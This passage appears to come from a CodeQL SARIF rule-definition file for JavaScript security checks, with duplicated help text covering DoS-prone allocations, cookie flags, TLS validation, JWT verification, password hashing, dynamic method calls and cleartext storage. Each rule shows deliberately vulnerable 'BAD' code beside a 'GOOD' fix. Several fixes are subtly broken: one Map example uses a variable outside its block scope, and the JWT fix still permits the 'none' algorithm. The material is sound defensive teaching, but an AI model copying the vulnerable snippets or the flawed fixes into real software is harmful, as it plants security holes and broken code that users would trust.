denial-of-service attacks.", - "id" : "js/missing-rate-limiting", - "kind" : "problem", - "name" : "Missing rate limiting", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/resource-exhaustion", - "name" : "js/resource-exhaustion", - "shortDescription" : { - "text" : "Resource exhaustion" - }, - "fullDescription" : { - "text" : "Allocating objects or timers with user-controlled sizes or durations can cause resource exhaustion." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n", - "markdown" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-400", "external/cwe/cwe-770" ], - "description" : "Allocating objects or timers with user-controlled\n sizes or durations can cause resource exhaustion.", - "id" : "js/resource-exhaustion", - "kind" : "path-problem", - "name" : "Resource exhaustion", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/client-exposed-cookie", - "name" : "js/client-exposed-cookie", - "shortDescription" : { - "text" : "Sensitive server cookie exposed to the client" - }, - "fullDescription" : { - "text" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n", - "markdown" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1004" ], - "description" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set.", - "id" : "js/client-exposed-cookie", - "kind" : "problem", - "name" : "Sensitive server cookie exposed to the client", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/disabling-certificate-validation", - "name" : "js/disabling-certificate-validation", - "shortDescription" : { - "text" : "Disabling certificate validation" - }, - "fullDescription" : { - "text" : "Disabling cryptographic certificate validation can cause security vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n", - "markdown" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-295", "external/cwe/cwe-297" ], - "description" : "Disabling cryptographic certificate validation can cause security vulnerabilities.", - "id" : "js/disabling-certificate-validation", - "kind" : "problem", - "name" : "Disabling certificate validation", - "precision" : "very-high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/jwt-missing-verification", - "name" : "js/jwt-missing-verification", - "shortDescription" : { - "text" : "JWT missing secret or public key verification" - }, - "fullDescription" : { - "text" : "The application does not verify the JWT payload with a cryptographic secret or public key." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n", - "markdown" : "# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-347" ], - "description" : "The application does not verify the JWT payload with a cryptographic secret or public key.", - "id" : "js/jwt-missing-verification", - "kind" : "problem", - "name" : "JWT missing secret or public key verification", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.0" - } - }, { - "id" : "js/insufficient-password-hash", - "name" : "js/insufficient-password-hash", - "shortDescription" : { - "text" : "Use of password hash with insufficient computational effort" - }, - "fullDescription" : { - "text" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n", - "markdown" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-916" ], - "description" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks.", - "id" : "js/insufficient-password-hash", - "kind" : "path-problem", - "name" : "Use of password hash with insufficient computational effort", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "8.1" - } - }, { - "id" : "js/unvalidated-dynamic-method-call", - "name" : "js/unvalidated-dynamic-method-call", - "shortDescription" : { - "text" : "Unvalidated dynamic method call" - }, - "fullDescription" : { - "text" : "Calling a method with a user-controlled name may dispatch to an unexpected target, which could cause an exception." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n", - "markdown" : "# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-754" ], - "description" : "Calling a method with a user-controlled name may dispatch to\n an unexpected target, which could cause an exception.", - "id" : "js/unvalidated-dynamic-method-call", - "kind" : "path-problem", - "name" : "Unvalidated dynamic method call", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/clear-text-storage-of-sensitive-data", - "name" : "js/clear-text-storage-of-sensitive-data", - "shortDescription" : { - "text" : "Clear text storage of sensitive information" - }, - "fullDescription" : { - "text" : "Sensitive information stored without encryption or hashing can expose it to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. 